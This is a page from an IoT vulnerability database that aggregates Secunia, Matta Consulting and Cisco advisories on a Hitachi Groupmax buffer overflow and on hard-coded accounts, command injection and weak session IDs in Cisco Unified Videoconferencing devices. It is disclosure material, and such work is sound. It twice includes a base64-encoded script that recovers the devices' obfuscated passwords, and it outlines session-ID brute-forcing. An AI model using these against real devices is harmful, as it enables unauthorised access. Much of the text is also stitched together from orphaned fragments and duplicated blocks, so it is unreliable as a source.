VARIoT IoT vulnerabilities database
| VAR-201011-0301 | No CVE | Hitachi Multiple Groupmax Product Unknown Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
The Hitachi Groupmax client product has vulnerabilities that allow malicious users to conduct denial of service attacks or execute arbitrary code. An unknown error when processing a file can cause a buffer overflow. Successful exploitation of the vulnerability could execute arbitrary code in the application security context. Multiple Hitachi Groupmax products are prone to an unspecified buffer-overflow vulnerability. Successful exploits will compromise the application and possibly the underlying system. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
Join the beta:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Hitachi Groupmax Client Products Unspecified Buffer Overflow
Vulnerability
SECUNIA ADVISORY ID:
SA42303
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42303/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42303
RELEASE DATE:
2010-11-17
DISCUSS ADVISORY:
http://secunia.com/advisories/42303/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42303/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42303
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple Hitachi Groupmax Client
products, which can be exploited by malicious people to cause a DoS
(Denial of Service) or potentially compromise a user's system.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply patches. Please see the vendor's advisory for more details.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
HS10-028:
http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS10-028/index.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201011-0226 | CVE-2010-3037 | plural Cisco UVC System Vulnerability to execute arbitrary commands in the product |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
goform/websXMLAdminRequestCgi.cgi in Cisco Unified Videoconferencing (UVC) System 5110 and 5115, and possibly Unified Videoconferencing System 3545 and 5230, Unified Videoconferencing 3527 Primary Rate Interface (PRI) Gateway, Unified Videoconferencing 3522 Basic Rate Interfaces (BRI) Gateway, and Unified Videoconferencing 3515 Multipoint Control Unit (MCU), allows remote authenticated administrators to execute arbitrary commands via the username field, related to a "shell command injection vulnerability," aka Bug ID CSCti54059. Cisco Unified Videoconferencing is an integral part of the Cisco Unified Communications system for organizations and service providers who need a reliable, easy-to-manage, and cost-effective network infrastructure for video conferencing applications. The script lacks proper filtering for multiple parameters, including but not limited to the \"username\" field. Obviously, the WEB service runs with ROOT privileges, which can lead to an attacker having complete control over the device. Cisco Unified Videoconferencing is prone to multiple remote command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
These issues are being tracked by Cisco bug ID CSCti54059.
NOTE: These issues were previously discussed in BID 44908 (Cisco Unified Videoconferencing Multiple Vulnerabilities and Weakness) but have been given their own record for better documentation. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta.
1) Multiple hard-coded accounts exist ("root", "cs", and "develop")
that cannot be disabled, which can be exploited to potentially gain
access to the device via e.g. brute force attacks.
Successful exploitation requires administrative credentials. using a brute force attack to iterate over all
possible time values from last system boot time. sniffing network traffic or a Man-in-the-Middle (MitM)
attack.
NOTE: Additionally, some configuration issues exists in the FTP, Web,
and OpenSSH servers.
PROVIDED AND/OR DISCOVERED BY:
Florent Daigniere, Matta Consulting.
ORIGINAL ADVISORY:
Matta (MATTA-2010-001):
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
Cisco:
http://www.cisco.com/warp/public/707/cisco-sr-20101117-cuvc.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. Matta Consulting - Matta Advisory
http://www.trustmatta.com
Cisco Unified Videoconferencing multiple vulnerabilities
Advisory ID: MATTA-2010-001
CVE reference: CVE-2010-3037 CVE-2010-3038
Affected platforms: Cisco Unified Videoconferencing 3515,3522,3527,5230,3545,
5110,5115 Systems and unspecified Radvision systems
Version: 7.0.1.13.3 at least and more likely all
Date: 2010-August-03
Security risk: Critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities
Researcher: Florent Daigniere
Vendor Status: Notified, working on a patch
Vulnerability Disclosure Policy:
http://www.trustmatta.com/advisories/matta-disclosure-policy-01.txt
Permanent URL:
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
=====================================================================
Description:
During an external pentest exercise for one of our clients, multiple
vulnerabilities and weaknesses were found on the Cisco CUVC-5110-HD10 which
allowed us to ultimately gain access to the internal network.
- - Hard-coded credentials - CVE-2010-3038
Three accounts have a login shell and a password the administrator can neither
disable nor change. The affected accounts are "root", "cs" and "develop".
Matta didn't spend the CPU cycles required to get those passwords but will
provide the salted hashes to interested parties.
- - Services misconfiguration
There is an FTP daemon (vsftpd) running but no mention in the documentation
of what it might be useful for. User credentials created from the
web-interface allow to explore the filesystem/firmware of the device.
The file /etc/shadow has read permissions for all.
The ssh daemon (openssh) has a non-default but curious configuration. It
allows port-forwarding and socks proxies to be created, X11 to be
forwarded... even with the restricted shells.
The daemon binding the port of the web-interface is running as root. There are numerous ways of remotely gathering the remote time and
uptime, the easiest being to ask over RPC... Assuming that a user or an
administrator logged into the device shortly after it was powered up, and
that the network connectivity is fast, it is practical to bruteforce a
valid session id.
Using this vulnerability, a non-authenticated attacker can authenticate. Over http in default configuration. While users
are not expected to reuse their credentials, in practice they do; this is
an information-disclosure bug. This is an
information-disclosure bug. Best practices recommend using PBKDF2 to store
passwords.
=====================================================================
Impact
If successful, a malicious third party can get full control of the device and
harvest user passwords with little to no effort. The Attacker might
reposition and launch an attack against other parts of the target
infrastructure from there. All deployed versions are probably
vulnerable.
=====================================================================
Threat mitigation
Until a patch is issued by the vendor, Matta recommends you unplug the
device from its network socket.
=====================================================================
Base64 encoded decryption script for the credentials:
IyEvYmluL2Jhc2gKIyBTbWFsbCBzY3JpcHQgdG8gZGVvYmZ1c2NhdGUgQ2lzY28gQ1VWQy01MTEw
LUhEMTAncyBwYXNzd29yZHMKIyBAc2VlIE1BVFRBLTIwMTAtMDAxCiMKIyAkMSBpcyB0aGUgb2Jm
dXNjYXRlZCBwYXNzd29yZAojIGV4YW1wbGUgdXNhZ2U6CiMKIyAkLi9kZWNvZGUtcGFzc3dvcmQu
c2ggZDVjNGQ2ZDZkMmNhZDdjMQojIHBhc3N3b3JkCiMKIwoKZWNobyAtbiAkMXxzZWQgJ3MvXCgu
LlwpL1wxXG4vZyd8d2hpbGUgcmVhZCBsaW5lCmRvCgljYXNlICIkbGluZSIgaW4KCQljNCkgbD1h
IDs7CgkJZTQpIGw9QSA7OwoJCWM3KSBsPWIgOzsKCQllNykgbD1CIDs7CgkJYzYpIGw9YyA7OwoJ
CWU2KSBsPUMgOzsKCQljMSkgbD1kIDs7CgkJZTEpIGw9RCA7OwoJCWMwKSBsPWUgOzsKCQllMCkg
bD1FIDs7CgkJYzMpIGw9ZiA7OwoJCWUzKSBsPUYgOzsKCQljMikgbD1nIDs7CgkJZTIpIGw9RyA7
OwoJCWNkKSBsPWggOzsKCQllZCkgbD1IIDs7CgkJY2MpIGw9aSA7OwoJCWVjKSBsPUkgOzsKCQlj
ZikgbD1qIDs7CgkJZWYpIGw9SiA7OwoJCWNlKSBsPWsgOzsKCQllZSkgbD1LIDs7CgkJYzkpIGw9
bCA7OwoJCWU5KSBsPUwgOzsKCQljOCkgbD1tIDs7CgkJZTgpIGw9TSA7OwoJCWNiKSBsPW4gOzsK
CQllYikgbD1OIDs7CgkJY2EpIGw9byA7OwoJCWRhKSBsPU8gOzsKCQlkNSkgbD1wIDs7CgkJZjUp
IGw9UCA7OwoJCWQ0KSBsPXEgOzsKCQlmNCkgbD1RIDs7CgkJZDcpIGw9ciA7OwoJCWY3KSBsPVIg
OzsKCQlkNikgbD1zIDs7CgkJZjYpIGw9UyA7OwoJCWQxKSBsPXQgOzsKCQlmMSkgbD1UIDs7CgkJ
ZDApIGw9dSA7OwoJCWYwKSBsPVUgOzsKCQlkMykgbD12IDs7CgkJZjMpIGw9ViA7OwoJCWQyKSBs
PXcgOzsKCQlmMikgbD1XIDs7CgkJZGQpIGw9eCA7OwoJCWZkKSBsPVggOzsKCQlkYykgbD15IDs7
CgkJZmMpIGw9WSA7OwoJCWRmKSBsPXogOzsKCQlmZikgbD1aIDs7CgoJCTk1KSBsPTAgOzsKCQk5
NCkgbD0xIDs7CgkJOTcpIGw9MiA7OwoJCTk2KSBsPTMgOzsKCQk5MSkgbD00IDs7CgkJOTApIGw9
NSA7OwoJCTkzKSBsPTYgOzsKCQk5MikgbD03IDs7CgkJOWQpIGw9OCA7OwoJCTljKSBsPTkgOzsK
CQkqKSAgbD0/OzsKCWVzYWMKCWVjaG8gLW4gIiRsIjsKZG9uZQplY2hvICIiCg==
=====================================================================
Credits
This vulnerability was discovered and researched by Florent Daigniere from
Matta Consulting.
Thank you to Paul Oxman and Matthew Cerha from the Cisco PSIRT for the
coordination effort.
=====================================================================
History
30-07-10 initial discovery
05-08-10 our client has mitigated the risk for his infrastructure
...
23-08-10 initial attempt to contact the vendor
23-08-10 sent pre-advisory to the vendor
PSIRT on psirt@cisco.com using PGP id 0xCF14FEE0
23-08-10 reply from the vendor, case PSIRT-0217563645 is open
...
21-09-10 agreement on the public disclosure date
...
08-11-10 planned disclosure date (missed), CVE assignments
...
17-11-10 public disclosure
=====================================================================
About Matta
Matta is a privately held company with Headquarters in London, and a European
office in Amsterdam. Established in 2001, Matta operates in Europe, Asia,
the Middle East and North America using a respected team of senior
consultants. Matta is an accredited provider of Tigerscheme training;
conducts regular research and is the developer behind the webcheck
application scanner, and colossus network scanner.
http://www.trustmatta.com
http://www.trustmatta.com/webapp_va.html
http://www.trustmatta.com/network_va.html
=====================================================================
Disclaimer and Copyright
Copyright (c) 2010 Matta Consulting Limited. All rights reserved.
This advisory may be distributed as long as its distribution is
free-of-charge and proper credit is given. Matta Consulting disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Matta Consulting or its
suppliers be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages,
even if Matta Consulting or its suppliers have been advised of the
possibility of such damages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Response: Multiple Vulnerabilities in Cisco Unified
Videoconferencing Products
http://www.cisco.com/warp/public/707/cisco-sr-20101117-cuvc.shtml
Revision 1.0
For Public Release 2010 November 17 1600 UTC (GMT)
+---------------------------------------------------------------------
Cisco Response
==============
This is the Cisco Product Security Incident Response Team (PSIRT)
response to a posting entitled "Cisco Unified Videoconferencing
multiple vulnerabilities" by Florent Daigniere of Matta Consulting
regarding vulnerabilities in the Cisco Unified Videoconferencing
(Cisco UVC) 5100 series products.
The original report is available at the following links:
http://seclists.org/fulldisclosure/2010/Nov/167
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
Cisco would like to thank Florent Daigniere of Matta Consulting for
reporting these vulnerabilities to us. Cisco greatly appreciate the
opportunity to work with researchers on security vulnerabilities and
welcome the opportunity to review and assist in product reports.
All versions of system software prior to the first fixed, which is
indicated in the Software Version and Fixes Table, are affected.
To view the version of system software that is currently running on
Cisco Unified Videoconferencing 5100 Series Products, access the
Cisco UVC device via the web GUI interface. On the status screen, the
"Software Version" field below the "Product Information" section
indicates the current system software.
Details for Reported Vulnerabilities
====================================
Hard-Coded Credentials in Cisco UVC Products
+-------------------------------------------
The Linux shell contains three hard-coded usernames and passwords.
The passwords cannot be changed, and the accounts cannot be deleted.
Attackers could leverage these accounts to obtain remote access to a
device by using permitted remote access protocols.
This vulnerability only affects Linux-based operating system Cisco
UVC products. Exploitation of this
vulnerability could result in a complete compromise of the device.
This vulnerability affects Linux-based operating system Cisco UVC
products. It may also affect VxWorks-based Cisco UVC products. The passwords in this file are
obfuscated using an easily reversible hashing scheme. Exploit code
that assists in recovering the passwords exists.
This vulnerability affects only Linux-based operating system Cisco
UVC products.
FTP Server Accessible by Default in Cisco UVC Products
+-----------------------------------------------------
The FTP server is enabled by default on Cisco UVC systems. An
attacker can leverage the FTP server to exploit other vulnerabilities
in this Cisco Security Response. Authentication is required to log
into the device via the FTP server.
FTP access to the device can be controlled via the "Security mode"
field of the Cisco UVC products web GUI. If the Security setting is
configured as "High" or "Maximum," the device will not accept FTP
connections. For further information, consult the Configuration Guide
for Cisco Unified Videoconferencing 5000 MCU Release 7.0 at the
following link:
http://www.cisco.com/en/US/docs/video/cuvc/7_0/configuration_guide/setup.html#wp1690479
This service misconfiguration affects both Linux-based operating
system Cisco UVC products and VxWorks-based Cisco UVC products.
Shadow Password File has Read Permissions for All Users in Cisco UVC Products
+----------------------------------------------------------------------------
The shadow password file should only be readable by the root account.
Allowing read access to the shadow password file allows other users
of the system with shell access to retrieve the shadow password file.
An authenticated user who has access to the Linux operating system
directories, may be able to retrieve the shadow password file.
This service misconfiguration only affects Linux-based operating
system Cisco UVC products.
Lock Down OpenSSH Configuration in Cisco UVC Products
+----------------------------------------------------
The SSH server has a restricted shell, however the configuration of
the SSH server allows for X.11 forwarding and socks proxies to be
created.
This service misconfiguration affects only Linux-based operating
system Cisco UVC products.
Daemon That Binds the Port of the Web Interface Runs as root in Cisco
UVC Products
In the event that all attacker exploits a flaw in a script running
with root's permissions that allows them to write to files, gain
access to the system or cause a denial of service.
This service misconfiguration affects only Linux-based operating
system Cisco UVC products.
Weak Session IDs on the Web Interface in Cisco UVC Products
+----------------------------------------------------------
The Cisco UVC web interface has session IDs that are incremented
based on a time counter. Having predictable session IDs, assists in
the hijacking of user sessions.
This vulnerability affects both Linux-based operating system Cisco
UVC products and VxWorks-based Cisco UVC products.
Usage of Cookies to Store Credentials in Cisco UVC Products
+----------------------------------------------------------
On Linux-based Cisco UVC products, web interface credentials are
stored in Base64 format in the cookie that is sent to a browser. On
VxWorks-based Cisco UVC products, web interface credentials are
stored in Base64 format or in clear text.
This vulnerability affects both Linux-based operating system Cisco
UVC products and VxWorks-based Cisco UVC products.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
All Cisco UVC software versions prior to the first fixed software
release, which is indicated in the following table, are affected by the
associated vulnerabilities.
This software table will be updated as software fixes become available.
+---------------------------------------+
| Linux Cisco UVC Operating System |
| Versions |
|---------------------------------------|
| Product: | First Fixed |
| | Release |
|-------------------+-------------------|
| | Currently no |
| Cisco Unified | fixed code |
| Videoconferencing | available. |
| 5110 and 5115 | Contact your |
| Systems | support |
| | organization. |
|---------------------------------------|
| VxWorks Cisco UVC Operating System |
| Versions |
|---------------------------------------|
| Product: | First Fixed |
| | Release |
|-------------------+-------------------|
| | Currently no |
| Cisco Unified | fixed code |
| Videoconferencing | available. |
| 5230 System: | Contact your |
| | support |
| | organization. |
| 3545 System: | Contact your |
| | support |
| | organization. |
| 3515 MCU: | Contact your |
| | support |
| | organization. |
| 3522 BRI Gateway: | Contact your |
| | support |
| | organization. |
| 3527 PRI Gateway: | Contact your |
| | support |
| | organization. |
+---------------------------------------+
Workarounds
===========
There are no workarounds for the vulnerabilities that are described in
this Cisco Security Response.
Administrators can mitigate these vulnerabilities by limiting access to
Cisco UVC web server to trusted hosts by disabling FTP, SSH, and Telnet
services and by setting the "Security mode" field in the "Security"
section of the Cisco UVC web GUI to "Maximum." For further information,
consult the Configuration Guide for Cisco Unified Videoconferencing 5000
MCU Release 7.0 at the following link:
http://www.cisco.com/en/US/docs/video/cuvc/7_0/configuration_guide/setup.html#wp1690479
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
Status of this Notice: INTERIM
==============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE.YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW
INFORMATION BECOMES AVAILABLE.
A stand-alone copy or Paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2010-November-17 | Initial public release. |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)
iF4EAREIAAYFAkzj6GAACgkQQXnnBKKRMNBMtwEAhEp+BKb+iRvXhPCBw/SGJSjx
mM5ljSrDefGSCtlhkawA/Ap85VdNrVcb3lVWb5rtXoqGbrqDnDozK6DGKejmQd8M
=f751
-----END PGP SIGNATURE-----
| VAR-201011-0227 | CVE-2010-3038 | Cisco UVC System 5110 and 5115 Unauthorized access vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Unified Videoconferencing (UVC) System 5110 and 5115, when the Linux operating system is used, has a default password for the (1) root, (2) cs, and (3) develop accounts, which makes it easier for remote attackers to obtain access via the (a) FTP or (b) SSH daemon, aka Bug ID CSCti54008. The problem is Bug ID CSCti54008 It is a problem.By a third party (a) FTP Or (b) SSH It may be accessed through a daemon. Cisco Unified Videoconferencing is an integral part of the Cisco Unified Communications system for organizations and service providers who need a reliable, easy-to-manage, and cost-effective network infrastructure for video conferencing applications. An attacker can use these accounts to gain access control for this device. Cisco Unified Videoconferencing is prone to an authentication-bypass vulnerability.
This issue is being tracked by Cisco bug ID CSCti54008.
NOTE: This issue was previously discussed in BID 44908 (Cisco Unified Videoconferencing Multiple Vulnerabilities and Weakness) but has been given its own record to better document it. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. brute force attacks.
2) Input passed via the "username" parameter to
goform/websXMLAdminRequestCgi.cgi is not properly sanitised before
being used as a command line argument, which can be exploited to
inject arbitrary shell commands with the privileges of the root
user.
Successful exploitation requires administrative credentials. using a brute force attack to iterate over all
possible time values from last system boot time. sniffing network traffic or a Man-in-the-Middle (MitM)
attack.
NOTE: Additionally, some configuration issues exists in the FTP, Web,
and OpenSSH servers.
PROVIDED AND/OR DISCOVERED BY:
Florent Daigniere, Matta Consulting.
ORIGINAL ADVISORY:
Matta (MATTA-2010-001):
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
Cisco:
http://www.cisco.com/warp/public/707/cisco-sr-20101117-cuvc.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. Matta Consulting - Matta Advisory
http://www.trustmatta.com
Cisco Unified Videoconferencing multiple vulnerabilities
Advisory ID: MATTA-2010-001
CVE reference: CVE-2010-3037 CVE-2010-3038
Affected platforms: Cisco Unified Videoconferencing 3515,3522,3527,5230,3545,
5110,5115 Systems and unspecified Radvision systems
Version: 7.0.1.13.3 at least and more likely all
Date: 2010-August-03
Security risk: Critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities
Researcher: Florent Daigniere
Vendor Status: Notified, working on a patch
Vulnerability Disclosure Policy:
http://www.trustmatta.com/advisories/matta-disclosure-policy-01.txt
Permanent URL:
http://www.trustmatta.com/advisories/MATTA-2010-001.txt
=====================================================================
Description:
During an external pentest exercise for one of our clients, multiple
vulnerabilities and weaknesses were found on the Cisco CUVC-5110-HD10 which
allowed us to ultimately gain access to the internal network.
Matta didn't spend the CPU cycles required to get those passwords but will
provide the salted hashes to interested parties.
- - Services misconfiguration
There is an FTP daemon (vsftpd) running but no mention in the documentation
of what it might be useful for. User credentials created from the
web-interface allow to explore the filesystem/firmware of the device.
The file /etc/shadow has read permissions for all.
The ssh daemon (openssh) has a non-default but curious configuration. It
allows port-forwarding and socks proxies to be created, X11 to be
forwarded... even with the restricted shells.
The daemon binding the port of the web-interface is running as root. There are numerous ways of remotely gathering the remote time and
uptime, the easiest being to ask over RPC... Assuming that a user or an
administrator logged into the device shortly after it was powered up, and
that the network connectivity is fast, it is practical to bruteforce a
valid session id.
Using this vulnerability, a non-authenticated attacker can authenticate. Over http in default configuration. While users
are not expected to reuse their credentials, in practice they do; this is
an information-disclosure bug. Many parameters can be abused,
including but not limited to the "username" field. This is an
information-disclosure bug. Best practices recommend using PBKDF2 to store
passwords.
=====================================================================
Impact
If successful, a malicious third party can get full control of the device and
harvest user passwords with little to no effort. The Attacker might
reposition and launch an attack against other parts of the target
infrastructure from there. All deployed versions are probably
vulnerable.
=====================================================================
Threat mitigation
Until a patch is issued by the vendor, Matta recommends you unplug the
device from its network socket.
=====================================================================
Base64 encoded decryption script for the credentials:
IyEvYmluL2Jhc2gKIyBTbWFsbCBzY3JpcHQgdG8gZGVvYmZ1c2NhdGUgQ2lzY28gQ1VWQy01MTEw
LUhEMTAncyBwYXNzd29yZHMKIyBAc2VlIE1BVFRBLTIwMTAtMDAxCiMKIyAkMSBpcyB0aGUgb2Jm
dXNjYXRlZCBwYXNzd29yZAojIGV4YW1wbGUgdXNhZ2U6CiMKIyAkLi9kZWNvZGUtcGFzc3dvcmQu
c2ggZDVjNGQ2ZDZkMmNhZDdjMQojIHBhc3N3b3JkCiMKIwoKZWNobyAtbiAkMXxzZWQgJ3MvXCgu
LlwpL1wxXG4vZyd8d2hpbGUgcmVhZCBsaW5lCmRvCgljYXNlICIkbGluZSIgaW4KCQljNCkgbD1h
IDs7CgkJZTQpIGw9QSA7OwoJCWM3KSBsPWIgOzsKCQllNykgbD1CIDs7CgkJYzYpIGw9YyA7OwoJ
CWU2KSBsPUMgOzsKCQljMSkgbD1kIDs7CgkJZTEpIGw9RCA7OwoJCWMwKSBsPWUgOzsKCQllMCkg
bD1FIDs7CgkJYzMpIGw9ZiA7OwoJCWUzKSBsPUYgOzsKCQljMikgbD1nIDs7CgkJZTIpIGw9RyA7
OwoJCWNkKSBsPWggOzsKCQllZCkgbD1IIDs7CgkJY2MpIGw9aSA7OwoJCWVjKSBsPUkgOzsKCQlj
ZikgbD1qIDs7CgkJZWYpIGw9SiA7OwoJCWNlKSBsPWsgOzsKCQllZSkgbD1LIDs7CgkJYzkpIGw9
bCA7OwoJCWU5KSBsPUwgOzsKCQljOCkgbD1tIDs7CgkJZTgpIGw9TSA7OwoJCWNiKSBsPW4gOzsK
CQllYikgbD1OIDs7CgkJY2EpIGw9byA7OwoJCWRhKSBsPU8gOzsKCQlkNSkgbD1wIDs7CgkJZjUp
IGw9UCA7OwoJCWQ0KSBsPXEgOzsKCQlmNCkgbD1RIDs7CgkJZDcpIGw9ciA7OwoJCWY3KSBsPVIg
OzsKCQlkNikgbD1zIDs7CgkJZjYpIGw9UyA7OwoJCWQxKSBsPXQgOzsKCQlmMSkgbD1UIDs7CgkJ
ZDApIGw9dSA7OwoJCWYwKSBsPVUgOzsKCQlkMykgbD12IDs7CgkJZjMpIGw9ViA7OwoJCWQyKSBs
PXcgOzsKCQlmMikgbD1XIDs7CgkJZGQpIGw9eCA7OwoJCWZkKSBsPVggOzsKCQlkYykgbD15IDs7
CgkJZmMpIGw9WSA7OwoJCWRmKSBsPXogOzsKCQlmZikgbD1aIDs7CgoJCTk1KSBsPTAgOzsKCQk5
NCkgbD0xIDs7CgkJOTcpIGw9MiA7OwoJCTk2KSBsPTMgOzsKCQk5MSkgbD00IDs7CgkJOTApIGw9
NSA7OwoJCTkzKSBsPTYgOzsKCQk5MikgbD03IDs7CgkJOWQpIGw9OCA7OwoJCTljKSBsPTkgOzsK
CQkqKSAgbD0/OzsKCWVzYWMKCWVjaG8gLW4gIiRsIjsKZG9uZQplY2hvICIiCg==
=====================================================================
Credits
This vulnerability was discovered and researched by Florent Daigniere from
Matta Consulting.
Thank you to Paul Oxman and Matthew Cerha from the Cisco PSIRT for the
coordination effort.
=====================================================================
History
30-07-10 initial discovery
05-08-10 our client has mitigated the risk for his infrastructure
...
23-08-10 initial attempt to contact the vendor
23-08-10 sent pre-advisory to the vendor
PSIRT on psirt@cisco.com using PGP id 0xCF14FEE0
23-08-10 reply from the vendor, case PSIRT-0217563645 is open
...
21-09-10 agreement on the public disclosure date
...
08-11-10 planned disclosure date (missed), CVE assignments
...
17-11-10 public disclosure
=====================================================================
About Matta
Matta is a privately held company with Headquarters in London, and a European
office in Amsterdam. Established in 2001, Matta operates in Europe, Asia,
the Middle East and North America using a respected team of senior
consultants. Matta is an accredited provider of Tigerscheme training;
conducts regular research and is the developer behind the webcheck
application scanner, and colossus network scanner.
http://www.trustmatta.com
http://www.trustmatta.com/webapp_va.html
http://www.trustmatta.com/network_va.html
=====================================================================
Disclaimer and Copyright
Copyright (c) 2010 Matta Consulting Limited. All rights reserved.
This advisory may be distributed as long as its distribution is
free-of-charge and proper credit is given. Matta Consulting disclaims all warranties, either
express or implied, including the warranties of merchantability and fitness
for a particular purpose. In no event shall Matta Consulting or its
suppliers be liable for any damages whatsoever including direct, indirect,
incidental, consequential, loss of business profits or special damages,
even if Matta Consulting or its suppliers have been advised of the
possibility of such damages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Response: Multiple Vulnerabilities in Cisco Unified
Videoconferencing Products
http://www.cisco.com/warp/public/707/cisco-sr-20101117-cuvc.shtml
Revision 1.0
For Public Release 2010 November 17 1600 UTC (GMT)
+---------------------------------------------------------------------
Cisco Response
==============
This is the Cisco Product Security Incident Response Team (PSIRT)
response to a posting entitled "Cisco Unified Videoconferencing
multiple vulnerabilities" by Florent Daigniere of Matta Consulting
